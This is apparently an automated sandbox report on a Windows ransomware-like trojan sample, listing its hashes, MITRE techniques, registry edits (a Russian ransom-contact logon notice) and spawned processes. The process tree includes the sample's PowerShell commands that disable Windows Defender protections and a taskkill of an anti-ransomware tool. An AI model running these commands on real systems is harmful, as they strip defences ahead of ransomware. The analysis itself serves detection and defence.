1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
143s
max time network
94s
platform
windows10_x64
resource
win10v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Size

368KB
MD5

2a6f56addd8adcbb1a6cc8e1d6090012
SHA1

03227744a280d56267cbef448f7e54a924f46173
SHA256

1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554
SHA512

63d951d531ac8c9be311a73ab3c70f3b0afe77a71bbc949ede5564bc98de523bc324c926cb9d4a49dd25171f62333e645e4a56d9e2b4cceab3976672a4eba2c0

Score

10^/10

discovery evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion

Executes dropped EXE 1 IoCs

pid	Process
13592	dismhost.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Loads dropped DLL 5 IoCs

pid	Process
13592	dismhost.exe
13592	dismhost.exe
13592	dismhost.exe
13592	dismhost.exe
13592	dismhost.exe

Modifies file permissions 1 TTPs 5 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
10428	icacls.exe
10420	icacls.exe
5816	icacls.exe
4560	icacls.exe
10436	icacls.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Нужна помощь наших специалистов?\r\n\r\nНапишите на почту - [email protected]\r\n\r\nВас обязательно проконсультируют и помогут Вам."	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание внимание внимание!!!"	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	powershell.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
4988	net.exe

Kills process with taskkill 57 IoCs

evasion

pid	Process
9860	taskkill.exe
9756	taskkill.exe
10352	taskkill.exe
10172	taskkill.exe
10064	taskkill.exe
9960	taskkill.exe
9748	taskkill.exe
10256	taskkill.exe
4688	taskkill.exe
9900	taskkill.exe
9852	taskkill.exe
10308	taskkill.exe
10140	taskkill.exe
10008	taskkill.exe
9828	taskkill.exe
10292	taskkill.exe
10040	taskkill.exe
10324	taskkill.exe
9936	taskkill.exe
9772	taskkill.exe
5620	taskkill.exe
10204	taskkill.exe
9908	taskkill.exe
9868	taskkill.exe
9796	taskkill.exe
9820	taskkill.exe
10344	taskkill.exe
10116	taskkill.exe
10092	taskkill.exe
9944	taskkill.exe
9928	taskkill.exe
9836	taskkill.exe
9812	taskkill.exe
10360	taskkill.exe
10336	taskkill.exe
10048	taskkill.exe
9916	taskkill.exe
9764	taskkill.exe
9740	taskkill.exe
10056	taskkill.exe
9988	taskkill.exe
9892	taskkill.exe
9876	taskkill.exe
10248	taskkill.exe
9844	taskkill.exe
9780	taskkill.exe
10300	taskkill.exe
10284	taskkill.exe
10072	taskkill.exe
9884	taskkill.exe
10316	taskkill.exe
10272	taskkill.exe
9804	taskkill.exe
4552	taskkill.exe
10368	taskkill.exe
10264	taskkill.exe
9788	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4628	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Token: SeDebugPrivilege	580	powershell.exe
Token: SeIncreaseQuotaPrivilege	580	powershell.exe
Token: SeSecurityPrivilege	580	powershell.exe
Token: SeTakeOwnershipPrivilege	580	powershell.exe
Token: SeLoadDriverPrivilege	580	powershell.exe
Token: SeSystemProfilePrivilege	580	powershell.exe
Token: SeSystemtimePrivilege	580	powershell.exe
Token: SeProfSingleProcessPrivilege	580	powershell.exe
Token: SeIncBasePriorityPrivilege	580	powershell.exe
Token: SeCreatePagefilePrivilege	580	powershell.exe
Token: SeBackupPrivilege	580	powershell.exe
Token: SeRestorePrivilege	580	powershell.exe
Token: SeShutdownPrivilege	580	powershell.exe
Token: SeDebugPrivilege	580	powershell.exe
Token: SeSystemEnvironmentPrivilege	580	powershell.exe
Token: SeRemoteShutdownPrivilege	580	powershell.exe
Token: SeUndockPrivilege	580	powershell.exe
Token: SeManageVolumePrivilege	580	powershell.exe
Token: 33	580	powershell.exe
Token: 34	580	powershell.exe
Token: 35	580	powershell.exe
Token: 36	580	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	2244	powershell.exe
Token: SeDebugPrivilege	616	powershell.exe
Token: SeDebugPrivilege	3612	powershell.exe
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	3828	powershell.exe
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeDebugPrivilege	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Token: SeDebugPrivilege	3548	powershell.exe
Token: SeDebugPrivilege	4212	powershell.exe
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeDebugPrivilege	4552	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2200	powershell.exe
Token: SeSecurityPrivilege	2200	powershell.exe
Token: SeTakeOwnershipPrivilege	2200	powershell.exe
Token: SeLoadDriverPrivilege	2200	powershell.exe
Token: SeSystemProfilePrivilege	2200	powershell.exe
Token: SeSystemtimePrivilege	2200	powershell.exe
Token: SeProfSingleProcessPrivilege	2200	powershell.exe
Token: SeIncBasePriorityPrivilege	2200	powershell.exe
Token: SeCreatePagefilePrivilege	2200	powershell.exe
Token: SeBackupPrivilege	2200	powershell.exe
Token: SeRestorePrivilege	2200	powershell.exe
Token: SeShutdownPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeSystemEnvironmentPrivilege	2200	powershell.exe
Token: SeRemoteShutdownPrivilege	2200	powershell.exe
Token: SeUndockPrivilege	2200	powershell.exe
Token: SeManageVolumePrivilege	2200	powershell.exe
Token: 33	2200	powershell.exe
Token: 34	2200	powershell.exe
Token: 35	2200	powershell.exe
Token: 36	2200	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeIncreaseQuotaPrivilege	3612	powershell.exe
Token: SeSecurityPrivilege	3612	powershell.exe
Token: SeTakeOwnershipPrivilege	3612	powershell.exe
Token: SeLoadDriverPrivilege	3612	powershell.exe
Token: SeSystemProfilePrivilege	3612	powershell.exe
Token: SeSystemtimePrivilege	3612	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 904 wrote to memory of 580	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	75
PID 904 wrote to memory of 580	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	75
PID 904 wrote to memory of 2200	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	78
PID 904 wrote to memory of 2200	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	78
PID 904 wrote to memory of 2244	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	80
PID 904 wrote to memory of 2244	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	80
PID 904 wrote to memory of 616	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	82
PID 904 wrote to memory of 616	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	82
PID 904 wrote to memory of 3612	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	84
PID 904 wrote to memory of 3612	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	84
PID 904 wrote to memory of 1516	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	86
PID 904 wrote to memory of 1516	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	86
PID 904 wrote to memory of 1604	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	88
PID 904 wrote to memory of 1604	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	88
PID 904 wrote to memory of 3828	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	90
PID 904 wrote to memory of 3828	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	90
PID 904 wrote to memory of 2172	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	92
PID 904 wrote to memory of 2172	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	92
PID 904 wrote to memory of 3548	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	94
PID 904 wrote to memory of 3548	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	94
PID 904 wrote to memory of 4212	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	96
PID 904 wrote to memory of 4212	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	96
PID 904 wrote to memory of 4348	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	98
PID 904 wrote to memory of 4348	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	98
PID 904 wrote to memory of 4476	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	100
PID 904 wrote to memory of 4476	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	100
PID 904 wrote to memory of 4552	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	102
PID 904 wrote to memory of 4552	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	102
PID 904 wrote to memory of 4604	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	104
PID 904 wrote to memory of 4604	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	104
PID 904 wrote to memory of 4628	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	105
PID 904 wrote to memory of 4628	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	105
PID 904 wrote to memory of 4692	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	107
PID 904 wrote to memory of 4692	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	107
PID 904 wrote to memory of 4776	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	109
PID 904 wrote to memory of 4776	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	109
PID 904 wrote to memory of 4812	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	197
PID 904 wrote to memory of 4812	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	197
PID 904 wrote to memory of 4856	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	113
PID 904 wrote to memory of 4856	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	113
PID 904 wrote to memory of 4924	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	115
PID 904 wrote to memory of 4924	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	115
PID 904 wrote to memory of 4992	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	116
PID 904 wrote to memory of 4992	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	116
PID 904 wrote to memory of 5040	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	120
PID 904 wrote to memory of 5040	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	120
PID 904 wrote to memory of 5092	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	121
PID 904 wrote to memory of 5092	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	121
PID 904 wrote to memory of 4164	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	122
PID 904 wrote to memory of 4164	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	122
PID 904 wrote to memory of 4748	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	207
PID 904 wrote to memory of 4748	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	207
PID 904 wrote to memory of 1964	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	208
PID 904 wrote to memory of 1964	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	208
PID 904 wrote to memory of 580	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	129
PID 904 wrote to memory of 580	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	129
PID 904 wrote to memory of 4156	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	131
PID 904 wrote to memory of 4156	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	131
PID 904 wrote to memory of 4608	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	132
PID 904 wrote to memory of 4608	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	132
PID 904 wrote to memory of 4744	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	135
PID 904 wrote to memory of 4744	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	135
PID 904 wrote to memory of 2120	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	136
PID 904 wrote to memory of 2120	904	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe	136

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание внимание внимание!!!"	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Нужна помощь наших специалистов?\r\n\r\nНапишите на почту - [email protected]\r\n\r\nВас обязательно проконсультируют и помогут Вам."	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe"
1⤵
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2200
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3612
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1516
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2172
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4476
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4552
